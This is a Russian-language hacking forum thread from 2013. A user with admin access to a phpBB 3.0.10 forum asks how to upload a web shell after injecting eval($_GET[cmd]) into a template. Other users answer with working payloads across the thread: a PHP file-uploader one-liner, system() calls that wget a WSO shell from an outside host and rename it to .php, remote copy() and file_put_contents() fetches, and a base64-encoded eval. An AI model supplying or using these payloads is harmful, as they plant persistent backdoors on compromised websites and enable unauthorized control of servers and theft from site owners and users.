HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу phpBB 3.0.10 Помогите залить шелл
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.03.2013, 16:33
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию
В общем есть доступ в админку

пробую залить шелл через правку шаблона

вставляю код eval($_GET[cmd]);

проверяю site.ru/forum/index.php?cmd=phpinfo(); - Работает

А вот когда пытаюсь залить шелл он почему то не заливается

делаю вот так site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...ничку
подскажите как ещё я могу залить шелл
 
Ответить с цитированием

  #2  
Старый 29.03.2013, 16:45
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию
Цитата:
Сообщение от None  
site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...me/sait.ru/www; mv wso.txt wso.php");
[/QUOTE]

[/QUOTE]
 
Ответить с цитированием

  #3  
Старый 29.03.2013, 16:46
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию
Попробуй так:

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php
 
Ответить с цитированием

  #4  
Старый 29.03.2013, 16:55
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию
Цитата:
Сообщение от OxoTnik  
Скажи, а нахрена тебе эта порнография ?
давай по простому
Или так
да просто всегда так заливал!

copy("http://сайт/wso.txt","2.php"); - не работает

file_put_contents('2.php', file_get_contents('http://сайт/wso.txt')); - не работает

и это тоже не работает

?cmd=system("cd /home/sait.ru/www; wget http://сайт/wso.txt");

далее

?cmd=system("cd /home/sait.ru/www; mv wso.txt wso.php");
 
Ответить с цитированием

  #5  
Старый 29.03.2013, 16:59
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию
eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??

Да быть такого не может чтобы через wget не заливалось...
 
Ответить с цитированием

  #6  
Старый 29.03.2013, 16:59
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию
Цитата:
Сообщение от Evil_Genius  
Попробуй так:
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php
Не много тебя не до понял

site.ru/forum/название_закачиваемого_фай ла.php

а где мне название это написать?
 
Ответить с цитированием

  #7  
Старый 29.03.2013, 17:00
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию
Цитата:
Сообщение от Hapk  
Не много тебя не до понял
site.ru/forum/название_закачиваемого_фай ла.php
а где мне название это написать?
закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php
 
Ответить с цитированием

  #8  
Старый 29.03.2013, 17:03
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию
Цитата:
Сообщение от OxoTnik  
eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??
Да быть такого не может чтобы через
wget
не заливалось...
Так тоже не работает((
 
Ответить с цитированием

  #9  
Старый 29.03.2013, 17:05
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию
Цитата:
Сообщение от Hapk  
Так тоже не работает((
так ты запрос изменил под себя я надеюсь ?

Если что в личку кинь, посмотрю
 
Ответить с цитированием

  #10  
Старый 29.03.2013, 17:08
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию
Цитата:
Сообщение от Evil_Genius  
закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php
я когда вот так делаю

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

у меня нечего не происходит
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.